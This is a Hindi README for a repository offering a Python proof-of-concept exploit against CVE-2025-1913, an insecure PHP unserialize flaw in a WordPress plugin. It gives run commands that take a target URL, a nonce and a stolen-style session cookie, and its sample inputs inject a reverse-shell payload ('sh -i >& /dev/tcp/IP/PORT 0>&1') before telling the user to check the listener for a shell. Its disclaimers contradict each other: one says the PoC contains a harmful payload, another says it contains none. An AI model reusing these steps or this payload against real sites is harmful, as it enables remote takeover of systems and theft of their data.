
CVE-2025-1913 प्रदर्शित करने वाला एक PoC, दिखाता है कि प्लगइन का असुरक्षित unserialize हैंडलिंग नियंत्रित वातावरण में उच्च-प्रभाव व्यवहार कैसे ले सकता है। इसमें केवल अधिकृत परीक्षण के लिए एक हानिकारक पेलोड शामिल है। केवल पृथक प्रयोगशालाओं और रक्षात्मक अनुसंधान के लिए सख्ती से उपयोग करें।
यह रिपॉजिटरी CVE-2025-1913 के लिए केवल शैक्षिक प्रूफ ऑफ कॉन्सेप्ट (PoC) रखता है, जिसे Suhaib518 🇸🇦 द्वारा बनाया गया है। यह PoC दर्शाता है कि विशेष रूप से तैयार किया गया सीरियलाइज़ PHP इनपुट प्रभावित WordPress घटकों में कमजोर तर्क को कैसे ट्रिगर कर सकता है। PoC सुरक्षित है और इसमें हानिकारक payloads शामिल नहीं हैं।
⚠️ अस्वीकरण: यह PoC केवल सीखने, अनुसंधान और रक्षात्मक सुरक्षा परीक्षण के लिए है। इसे उन सर्वरों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।
यह कमज़ोरी कुछ WordPress प्लगइन वर्कफ़्लो में PHP सीरियलाइज़ डेटा के असुरक्षित संचालन के कारण मौजूद है। यह PoC दर्शाता है कि हमलावर कैसे तैयार किए गए सीरियलाइज़्ड संरचनाओं की आपूर्ति कर सकता है जो अनपेक्षित आंतरिक व्यवहार का कारण बनती हैं।
इस रिपॉजिटरी में एक Python स्क्रिप्ट शामिल है जो:
.
├── CVE-2025-1913-PoC.py # Suhaib518 KSA द्वारा बनाई गई PoC स्क्रिप्ट
└── README.md # दस्तावेज़ीकरण
स्क्रिप्ट केवल अंतर्निहित Python मॉड्यूल का उपयोग करती है, सिवाय requests के:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
आपसे पूछा जाएगा:
स्क्रिप्ट फिर उन्हें सीरियलाइज़ करेगी, एक WordPress अनुरोध बनाएगी, और भेज देगी।
नीचे एक उदाहरण कमांड है जो उदाहरण मानों (ये दुर्भावनापूर्ण नहीं हैं, केवल प्रक्रिया दिखा रहे हैं) के साथ उपयोग को प्रदर्शित करता है:
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
इंटरैक्टिव प्रश्नों के उदाहरण उत्तर:
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
स्क्रिप्ट तब प्रिंट करेगी:
[*] Sending request…
....शेल के लिए लिसनर की जाँच करें।
unserialize() का उपयोग करने से बचेंMIT लाइसेंस।
Suhaib518 🇸🇦 द्वारा बनाया गया।